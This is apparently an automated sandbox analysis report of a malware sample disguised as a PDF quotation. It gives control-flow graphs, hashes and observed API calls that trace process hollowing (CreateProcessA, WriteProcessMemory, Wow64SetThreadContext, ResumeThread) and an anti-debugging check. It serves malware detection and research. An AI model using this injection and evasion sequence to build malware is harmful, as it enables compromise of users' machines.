                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$(bq$(bq
                                                    • API String ID: 0-2716923250
                                                    • Opcode ID: a45287879d2f5ef3583a41d31f301f101f82bde7b3ec17336792a84b42547d6a
                                                    • Instruction ID: d742d8ba7422faf4a2bfb1ac0982a75915226861f8692af9a55822213082a4f8
                                                    • Opcode Fuzzy Hash: a45287879d2f5ef3583a41d31f301f101f82bde7b3ec17336792a84b42547d6a
                                                    • Instruction Fuzzy Hash: 105122763042664FC715DF79D840A6E7BE6EFC5711B1884AAE909CB792CA35DC02C7E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 717 f75160 718 f75165-f75177 717->718 719 f75131-f75154 718->719 720 f75179-f751c8 718->720 719->717 724 f751e6-f751e8 720->724 725 f751ca-f751df 720->725 726 f752a1-f75315 724->726 727 f751ee-f751f9 724->727 725->724 744 f7531c-f75324 726->744 729 f7521f-f7522d 727->729 730 f751fb-f7521d call f74d78 727->730 735 f75235-f7523a call f74dec 729->735 742 f75241-f75243 730->742 740 f7523f 735->740 740->742 742->744 745 f75249-f7524f 742->745 753 f7532b-f7539a 744->753 746 f75251-f75261 745->746 747 f7527f 745->747 750 f75268-f75270 call f74df8 746->750 752 f75288-f7528d 747->752 757 f75275-f75279 750->757 756 f75295-f7529e 752->756 766 f75421-f75433 753->766 767 f753a0-f753b1 753->767 757->747 757->753 770 f753b3-f753be 767->770 771 f753e1-f753f7 770->771 772 f753c0-f753de 770->772 771->770 775 f753f9-f75420 call f70160 771->775 772->771
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2222091925.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_f70000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hbq$Te^q
                                                    • API String ID: 0-4204034466
                                                    • Opcode ID: 12ecbf557242f49ec12bc7cf22f53e71185d9e007b975ac202bbfeaccb9cd9b1
                                                    • Instruction ID: e3f59727e634b13242bede20745d7a6278989b5a8cf99b22ffbfe2560942538b
                                                    • Opcode Fuzzy Hash: 12ecbf557242f49ec12bc7cf22f53e71185d9e007b975ac202bbfeaccb9cd9b1
                                                    • Instruction Fuzzy Hash: 28811530B006155FCB05AFB9C8546AEBBE3EFC9310B14856AE00ADB391DF748D06D7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 781 7201030-7201068 783 7201154-7201179 781->783 784 720106e-7201072 781->784 791 7201180-72011a4 783->791 785 7201074-7201080 784->785 786 7201086-720108a 784->786 785->786 785->791 788 7201090-72010a7 786->788 789 72011ab-72011d0 786->789 799 72010a9-72010b5 788->799 800 72010bb-72010bf 788->800 807 72011d7-720122a 789->807 791->789 799->800 799->807 802 72010c1-72010da 800->802 803 72010eb-7201104 800->803 802->803 815 72010dc-72010df 802->815 813 7201106-720112a 803->813 814 720112d-720112f 803->814 824 7201262-7201287 807->824 825 720122c-720124c 807->825 865 7201132 call 72012d0 814->865 866 7201132 call 7201030 814->866 867 7201132 call 7201218 814->867 817 72010e8 815->817 817->803 819 7201138-7201151 832 720128e-72012e2 824->832 825->832 833 720124e-720125f 825->833 839 72012e8-72012f4 832->839 840 7201389-72013d7 832->840 843 72012f6-72012fd 839->843 844 72012fe-7201312 839->844 852 7201407-720140d 840->852 853 72013d9-72013fd 840->853 848 7201381-7201388 844->848 849 7201314-7201339 844->849 859 720133b-720134d 849->859 860 720137c-720137f 849->860 855 720141f-720142e 852->855 856 720140f-720141c 852->856 853->852 854 72013ff 853->854 854->852 861 7201353-7201355 859->861 860->848 860->849 861->860 862 7201357-7201360 861->862 863 7201362-7201365 862->863 864 720136f-720137b 862->864 863->864 865->819 866->819 867->819
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$(bq
                                                    • API String ID: 0-4224401849
                                                    • Opcode ID: 83db90b2e5569f6d86d22c289efe4e52307a773fc8720fdd1621c610dd5d5c26
                                                    • Instruction ID: d49c650aec5664b2b80433decf82da1c14cdb7c9a02d171a0748b027458a138c
                                                    • Opcode Fuzzy Hash: 83db90b2e5569f6d86d22c289efe4e52307a773fc8720fdd1621c610dd5d5c26
                                                    • Instruction Fuzzy Hash: D251DD7130025A9FCB159F68D841AAE7BA6FF88311F148169E906CB3D2CB35DD52CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 868 720b438-720b443 869 720b451 868->869 870 720b445-720b44f 868->870 871 720b456-720b458 869->871 870->871 872 720b486-720b4fb 871->872 873 720b45a-720b46d call 7204010 call 7207e18 871->873 889 720b500-720b508 872->889 910 720b46f call 720b428 873->910 911 720b46f call 720b438 873->911 880 720b475-720b483 call 7206fb0 890 720b50a-720b524 889->890 891 720b55c-720b59c 889->891 896 720b556-720b55a 890->896 897 720b526-720b534 890->897 902 720b5a3-720b5cc 891->902 896->890 896->891 897->896 901 720b536-720b53a 897->901 901->902 903 720b53c-720b54a 901->903 908 720b5d3 902->908 909 720b5ce call 720b438 902->909 903->896 907 720b54c-720b555 903->907 909->908 910->880 911->880
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$Hbq
                                                    • API String ID: 0-4081012451
                                                    • Opcode ID: c036cb70db02abf3fcfd0ba5a03b4761775108702f7627f8131aa39b377298b4
                                                    • Instruction ID: f121c8887db9c3f7d94c327b4fd4179b9e3ae037f78d02f28d9979a357d9515d
                                                    • Opcode Fuzzy Hash: c036cb70db02abf3fcfd0ba5a03b4761775108702f7627f8131aa39b377298b4
                                                    • Instruction Fuzzy Hash: 025114B53142518FC715DB78C86096E7FB6EF8A710B1580AAE505CB3E2CA35DD02CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 912 5c038e4-5c038e8 913 5c02a63-5c02a9e 912->913 914 5c038ee-5c03910 912->914 948 5c02aa4 call 5c05030 913->948 949 5c02aa4 call 5c05021 913->949 915 5c02a10-5c02a1b 914->915 916 5c03916-5c03921 914->916 919 5c029c2-5c029ce 915->919 920 5c02922-5c02944 915->920 921 5c029d3-5c029d4 915->921 922 5c02954-5c0295b 915->922 923 5c02995-5c02996 915->923 924 5c029d6-5c02a05 915->924 925 5c02998-5c029b3 915->925 926 5c029b8-5c029bf 915->926 927 5c02dd8-5c02e39 915->927 928 5c028eb-5c02913 915->928 929 5c028de-5c028e9 915->929 916->915 930 5c028c6-5c028cf 919->930 920->930 934 5c02946-5c0294f 920->934 921->919 922->926 935 5c0295d-5c0297f 922->935 923->925 924->915 925->930 927->915 947 5c02e3f-5c02e4a 927->947 928->930 933 5c02915-5c02920 928->933 929->930 936 5c028d1 930->936 937 5c028d8-5c028d9 930->937 933->930 934->930 935->930 940 5c02985-5c02990 935->940 936->919 936->920 936->921 936->922 936->923 936->924 936->925 936->926 936->928 936->929 937->923 937->929 940->930 945 5c02aaa-5c02acb 945->915 947->915 948->945 949->945
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7$@
                                                    • API String ID: 0-1498516017
                                                    • Opcode ID: 85c53be40914d523ca6c911f91ff9a935afc394720809bde6fd02bd770927c77
                                                    • Instruction ID: e0b8a00357b29f56bdfc829a54dbc01a7017bb61c14e0e0f8b49403b390fe592
                                                    • Opcode Fuzzy Hash: 85c53be40914d523ca6c911f91ff9a935afc394720809bde6fd02bd770927c77
                                                    • Instruction Fuzzy Hash: F751D579905268CFEB20CF55D848BEDB7B2BB49304F10A9EAD40AB7290D7754AC5CF24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 950 5c0345c-5c03463 951 5c03469-5c0348b 950->951 952 5c0364c-5c0367c 950->952 953 5c02a10-5c02a1b 951->953 954 5c03491-5c0349c 951->954 986 5c03682 call 5c05158 952->986 987 5c03682 call 5c05168 952->987 957 5c029c2-5c029ce 953->957 958 5c02922-5c02944 953->958 959 5c029d3-5c029d4 953->959 960 5c02954-5c0295b 953->960 961 5c02995-5c02996 953->961 962 5c029d6-5c02a05 953->962 963 5c02998-5c029b3 953->963 964 5c029b8-5c029bf 953->964 965 5c02dd8-5c02e39 953->965 966 5c028eb-5c02913 953->966 967 5c028de-5c028e9 953->967 954->953 968 5c028c6-5c028cf 957->968 958->968 971 5c02946-5c0294f 958->971 959->957 960->964 972 5c0295d-5c0297f 960->972 961->963 962->953 963->968 965->953 985 5c02e3f-5c02e4a 965->985 966->968 970 5c02915-5c02920 966->970 967->968 974 5c028d1 968->974 975 5c028d8-5c028d9 968->975 970->968 971->968 972->968 978 5c02985-5c02990 972->978 974->957 974->958 974->959 974->960 974->961 974->962 974->963 974->964 974->966 974->967 975->961 975->967 978->968 983 5c03688-5c0369e 985->953 986->983 987->983
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,$G
                                                    • API String ID: 0-3611710211
                                                    • Opcode ID: db49de1629612d75941f93a0b388e8a628bdaa9f9ffe9507c05a94082c7a5a1e
                                                    • Instruction ID: 0ef6a7a57117a54a4233d309006f827939eb59326efb7c81f59e55bf80a1ad4a
                                                    • Opcode Fuzzy Hash: db49de1629612d75941f93a0b388e8a628bdaa9f9ffe9507c05a94082c7a5a1e
                                                    • Instruction Fuzzy Hash: E651E478905269CFEB60CF5AC848BE9B7B2BB45300F10A9EAC40DB7290D7744AC4CF24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1159 72056e0-720572e 1161 7205730-7205739 1159->1161 1162 720573f-720575a 1159->1162 1161->1162 1163 7205760-720577a call 7201510 1162->1163 1164 7205c7a-7205c87 1162->1164 1170 7205780-7205791 1163->1170 1171 7205b46-7205ba2 1163->1171 1165 7205c92-7205cdc 1164->1165 1166 7205c89-7205c8f 1164->1166 1169 7205ce5-7205ce9 1165->1169 1166->1165 1172 7205bea-7205c3f 1169->1172 1173 7205cef-7205cf9 1169->1173 1174 7205793-72057a4 1170->1174 1175 72057b5-72057e9 1170->1175 1188 7205bad-7205bdf 1171->1188 1217 7205c4a 1172->1217 1176 7205eee-7205f2d 1173->1176 1177 7205cff-7205d11 1173->1177 1174->1175 1183 72057a6-72057af 1174->1183 1185 720580a-72058ba 1175->1185 1186 72057eb-72057fe call 72012d0 1175->1186 1199 7205f34-7205f3a 1176->1199 1177->1176 1182 7205d17-7205d1f 1177->1182 1187 7205d25-7205da7 1182->1187 1182->1188 1183->1175 1240 72058c0-72058c7 1185->1240 1241 7205b09-7205b3b 1185->1241 1186->1185 1226 72060a3-72060ad 1187->1226 1227 7205dad-7205dbd 1187->1227 1188->1172 1205 7205f42-7205f8f 1199->1205 1210 7205f91-7205ff1 1205->1210 1211 7205ff3-720603a 1205->1211 1215 7206040-720609e 1210->1215 1211->1215 1221 7205eac-7205ecf 1215->1221 1222 7205c4f-7205c6b 1217->1222 1234 7205ed5-7205ee9 1221->1234 1235 7205a48-7205a4f 1221->1235 1222->1164 1226->1221 1230 72060b3-72060c3 1226->1230 1227->1199 1229 7205dc3-7205dd6 1227->1229 1242 7205de1-7205df6 1229->1242 1243 7205dd8-7205dde 1229->1243 1230->1221 1232 72060c9-72060d3 1230->1232 1232->1221 1233 72060d9-72060fc 1232->1233 1233->1221 1234->1235 1238 7205ad1-7205ae7 1235->1238 1239 7205a55-7205a6a 1235->1239 1247 7206144-7206157 1238->1247 1252 7205a70-7205a8e call 7206b58 1239->1252 1253 7206101-7206116 1239->1253 1240->1217 1246 72058cd-720596e 1240->1246 1241->1171 1242->1205 1257 7205dfc-7205eaa 1242->1257 1243->1242 1246->1222 1282 7205974-7205a46 1246->1282 1260 7206158 1247->1260 1269 7205a94-7205aa0 1252->1269 1264 7205aec-7205b01 1253->1264 1265 720611c-720613d 1253->1265 1257->1221 1260->1260 1264->1241 1265->1247 1271 7205aa2-7205aac 1269->1271 1272 7205aae-7205acf 1269->1272 1271->1238 1271->1272 1272->1238 1282->1235
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,bq
                                                    • API String ID: 0-2474004448
                                                    • Opcode ID: 90a4eccab87dd852f270676d552009a8e8ead9e8f2f0d58f60d9490457698e90
                                                    • Instruction ID: 1540d1d8d04ff0915077a242aef2f4d062de1de84838cda266c1355075b4e338
                                                    • Opcode Fuzzy Hash: 90a4eccab87dd852f270676d552009a8e8ead9e8f2f0d58f60d9490457698e90
                                                    • Instruction Fuzzy Hash: 69520AB5A102289FDB64DF69C945BDDBBF2BF88300F1540D9E509AB391DA349E80CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1294 7200040-7200063 1296 7200072-720007b 1294->1296 1297 7200065-7200070 1294->1297 1297->1296 1298 720007e-72000b2 call 72007b0 1297->1298 1301 7200103-720012a 1298->1301 1302 72000b4-72000cc 1298->1302 1306 7200130 1301->1306 1307 720031d-720032f 1301->1307 1302->1301 1305 72000ce-72000f9 1302->1305 1305->1301 1315 72000fb-7200100 1305->1315 1308 7200139-7200141 1306->1308 1313 7200331-7200349 1307->1313 1314 720034e-7200354 1307->1314 1311 7200143 1308->1311 1312 720014a-720014d 1308->1312 1311->1312 1316 7200161-7200173 1311->1316 1317 7200281-7200295 1311->1317 1318 72001e8-72001fa 1311->1318 1319 7200249-7200265 1311->1319 1320 720026a-720027c 1311->1320 1321 72002af-72002cb 1311->1321 1322 72001d0-72001e3 1311->1322 1323 7200231-7200244 1311->1323 1324 7200218-720022c 1311->1324 1325 72001b8-72001cb 1311->1325 1326 7200178-72001b3 1311->1326 1327 720029a-72002ad 1311->1327 1328 72001ff-7200213 1311->1328 1329 7200153-7200156 1312->1329 1330 72002cd-72002ef 1312->1330 1313->1314 1342 720034b 1313->1342 1331 7200363-72003ad call 7201030 1314->1331 1332 7200356-720035d 1314->1332 1315->1301 1316->1307 1317->1307 1318->1307 1319->1307 1320->1307 1321->1307 1322->1307 1323->1307 1324->1307 1325->1307 1326->1307 1327->1307 1328->1307 1335 72002f1-720031b 1329->1335 1336 720015c 1329->1336 1330->1307 1357 72003b3 1331->1357 1332->1331 1334 720035f-7200361 1332->1334 1345 72003b5-72003b7 1334->1345 1335->1307 1336->1307 1342->1314 1355 72006db-72006e4 1345->1355 1356 72003bd-72003c6 1345->1356 1358 72003d8-7200418 1356->1358 1359 72003c8-72003d0 1356->1359 1357->1345 1366 720041a-720042a 1358->1366 1367 720042c 1358->1367 1359->1358 1366->1367 1368 720042e-7200430 1366->1368 1367->1368 1370 7200432-720044d 1368->1370 1371 720044f-720047e 1368->1371 1376 72004bb-72004c3 1370->1376 1371->1376 1381 7200480-72004ac 1371->1381 1378 72004d1 1376->1378 1379 72004c5-72004cf 1376->1379 1380 72004d6-72004d8 1378->1380 1379->1380 1382 72004e8-720055a 1380->1382 1383 72004da-72004e0 1380->1383 1381->1376 1390 72004ae-72004b2 1381->1390 1391 720055c-7200573 1382->1391 1392 720057e-72005a4 1382->1392 1383->1382 1390->1376 1391->1392 1394 72005a6-72005b3 call 7201510 1392->1394 1395 72005bb 1392->1395 1397 72005b9 1394->1397 1396 72005bd-72005dc 1395->1396 1396->1355 1399 72005e2-72005f4 1396->1399 1397->1396 1399->1355 1401 72005fa-7200612 1399->1401 1403 7200614-720061d 1401->1403 1404 720064b-7200663 1401->1404 1405 720062c-7200633 1403->1405 1406 720061f-7200622 1403->1406 1409 7200693-72006ab 1404->1409 1410 7200665-720066e 1404->1410 1405->1404 1407 7200635-7200646 1405->1407 1406->1405 1407->1355 1409->1355 1416 72006ad-72006b6 1409->1416 1412 7200670-7200673 1410->1412 1413 720067d-7200686 1410->1413 1412->1413 1413->1409 1414 7200688-7200690 1413->1414 1414->1409 1418 72006c5-72006ce 1416->1418 1419 72006b8-72006bb 1416->1419 1418->1355 1420 72006d0-72006d8 1418->1420 1419->1418 1420->1355
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (_^q
                                                    • API String ID: 0-538443824
                                                    • Opcode ID: 0a2cbd9a03b03378564b9fefb287957b9bd41328028bb5796226d45e022f7d4c
                                                    • Instruction ID: a9ff21c1c4971da8bbf69c82864c78c47180bee36a38cf21154051005d79c05f
                                                    • Opcode Fuzzy Hash: 0a2cbd9a03b03378564b9fefb287957b9bd41328028bb5796226d45e022f7d4c
                                                    • Instruction Fuzzy Hash: 07227EB5B102059FDB14DFA8C495BADB7B2FF88300F158059E905AB392DB75ED81CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1425 748391c-7483998 1427 748399a-74839a4 1425->1427 1428 74839d1-74839f1 1425->1428 1427->1428 1429 74839a6-74839a8 1427->1429 1435 7483a2a-7483a64 1428->1435 1436 74839f3-74839fd 1428->1436 1430 74839aa-74839b4 1429->1430 1431 74839cb-74839ce 1429->1431 1433 74839b8-74839c7 1430->1433 1434 74839b6 1430->1434 1431->1428 1433->1433 1437 74839c9 1433->1437 1434->1433 1442 7483a9d-7483b12 CreateProcessA 1435->1442 1443 7483a66-7483a70 1435->1443 1436->1435 1438 74839ff-7483a01 1436->1438 1437->1431 1440 7483a03-7483a0d 1438->1440 1441 7483a24-7483a27 1438->1441 1444 7483a0f 1440->1444 1445 7483a11-7483a20 1440->1445 1441->1435 1455 7483b1b-7483b63 1442->1455 1456 7483b14-7483b1a 1442->1456 1443->1442 1447 7483a72-7483a74 1443->1447 1444->1445 1445->1445 1446 7483a22 1445->1446 1446->1441 1448 7483a76-7483a80 1447->1448 1449 7483a97-7483a9a 1447->1449 1451 7483a82 1448->1451 1452 7483a84-7483a93 1448->1452 1449->1442 1451->1452 1452->1452 1454 7483a95 1452->1454 1454->1449 1461 7483b73-7483b77 1455->1461 1462 7483b65-7483b69 1455->1462 1456->1455 1464 7483b79-7483b7d 1461->1464 1465 7483b87-7483b8b 1461->1465 1462->1461 1463 7483b6b 1462->1463 1463->1461 1464->1465 1466 7483b7f 1464->1466 1467 7483b9b-7483bf5 1465->1467 1468 7483b8d-7483b91 1465->1468 1466->1465 1472 7483b97-7483b9a 1467->1472 1473 7483bf7-7483c6b 1467->1473 1468->1467 1469 7483b93 1468->1469 1469->1467 1472->1467 1476 7483c7b-7483cab Wow64SetThreadContext 1473->1476 1477 7483c6d-7483c79 1473->1477 1479 7483cad-7483cb3 1476->1479 1480 7483cb4-7483ce4 1476->1480 1477->1476 1479->1480
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07483B02
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 827dbde4b349f5e261e5b8c4d062e0ed18c8a24f7f6aa990c9182ea208c92dd5
                                                    • Instruction ID: 024e2a04483603609fc187ccfa290b8cdf7fbc2d4727cbe9424fadbd6f006667
                                                    • Opcode Fuzzy Hash: 827dbde4b349f5e261e5b8c4d062e0ed18c8a24f7f6aa990c9182ea208c92dd5
                                                    • Instruction Fuzzy Hash: 8C8145B1D0025A9FDB50DFA9C8857EEBBF1AF48714F14852AE859AB381D7348881CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07483B02
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: eaf8743ea203e7c7d6aca5369767a6da10412a7aff1e208c973fba8df477d488
                                                    • Instruction ID: 561bff8b324720bf5597c057dfa394892978e57e85d1ad6b6ec9227bc32a9d39
                                                    • Opcode Fuzzy Hash: eaf8743ea203e7c7d6aca5369767a6da10412a7aff1e208c973fba8df477d488
                                                    • Instruction Fuzzy Hash: 2D8155B1D0024E9FDB50DFA9C8857EEBBF1BF48714F14852AE818AB341D7349881CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q
                                                    • API String ID: 0-388095546
                                                    • Opcode ID: 2c446ed51ea389b79a9b4ee810bd62ce85a16db0af9cf9ac46e4bc59d98ceba9
                                                    • Instruction ID: 117ea4fb82d950b4307d1ccd73e549211b361bf966307f7f4ad24c49c20465f0
                                                    • Opcode Fuzzy Hash: 2c446ed51ea389b79a9b4ee810bd62ce85a16db0af9cf9ac46e4bc59d98ceba9
                                                    • Instruction Fuzzy Hash: A5E1BEF07202469FDB14AF68C81166A7BE2FF95300F148069E986DB7D3DA74CD618BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07484387
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 257fa886a6c4b47f291b37a769ee4946c3dd7ef1e66ec6790ccf9cd3e6e3ac22
                                                    • Instruction ID: 42b9aaa860d789ffd3d6e5d927cfac7e152c8a4080ce3165029a15604c58021a
                                                    • Opcode Fuzzy Hash: 257fa886a6c4b47f291b37a769ee4946c3dd7ef1e66ec6790ccf9cd3e6e3ac22
                                                    • Instruction Fuzzy Hash: 2B41F2B68003498FCB01DFA9D8457EEBFF0EF49320F14842AE459A3291C7389555DFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07483C9E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 603a555bf98820b07f36fc7cfca0e366d15bda436e8d8582dbc71c9575d72491
                                                    • Instruction ID: 8ac0cdaa3e2a85f2606fe1f8d3bbb3b3ed914422ebd2d5b817fe41ff4155723a
                                                    • Opcode Fuzzy Hash: 603a555bf98820b07f36fc7cfca0e366d15bda436e8d8582dbc71c9575d72491
                                                    • Instruction Fuzzy Hash: 6E31E1B58043489FCB01DFA9C845BEEBFF0EF49354F14842AD448A7342C7349989CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 63d2799a1f192ebf13df2de2ce644bc15d9582f6c6c4ccfabe7e2082dd1eb030
                                                    • Instruction ID: cb0054d7b2b117b2f3d22d17f125712c093f6d75bb14cdee9debfc7651cebec7
                                                    • Opcode Fuzzy Hash: 63d2799a1f192ebf13df2de2ce644bc15d9582f6c6c4ccfabe7e2082dd1eb030
                                                    • Instruction Fuzzy Hash: A021BFB19043888FCB11EFA9C8467DEBFF4EB4A220F14885AD414F7291D7395A49CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07484387
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 4aa86b96f006ff228579e539d1d1bb2d60b793fb7edb4cc6c27cb49d08b4fd8f
                                                    • Instruction ID: 3a1c1f8a06a00a0ae523e487d9fb53e045024087392515453a809781fecc6f26
                                                    • Opcode Fuzzy Hash: 4aa86b96f006ff228579e539d1d1bb2d60b793fb7edb4cc6c27cb49d08b4fd8f
                                                    • Instruction Fuzzy Hash: 39217AB190034A9FCB10DFAAC845BEEBBF4FF48320F10842AE419A3241C7789955DFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 074854E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: CheckDebuggerPresentRemote
                                                    • String ID:
                                                    • API String ID: 3662101638-0
                                                    • Opcode ID: 660942973fa2f0b893c76a612ca2d0e04397eca7a94fbd02d62b9b400157e271
                                                    • Instruction ID: 0161451be2923c5d920e6b6b0d576a817f94424ae3a9bf0553ae1d279cda28ba
                                                    • Opcode Fuzzy Hash: 660942973fa2f0b893c76a612ca2d0e04397eca7a94fbd02d62b9b400157e271
                                                    • Instruction Fuzzy Hash: AF2181B19002498FDB14DFAAD4447EEFBF5AF59320F14846ED459A7240C7389645DF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07484387
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
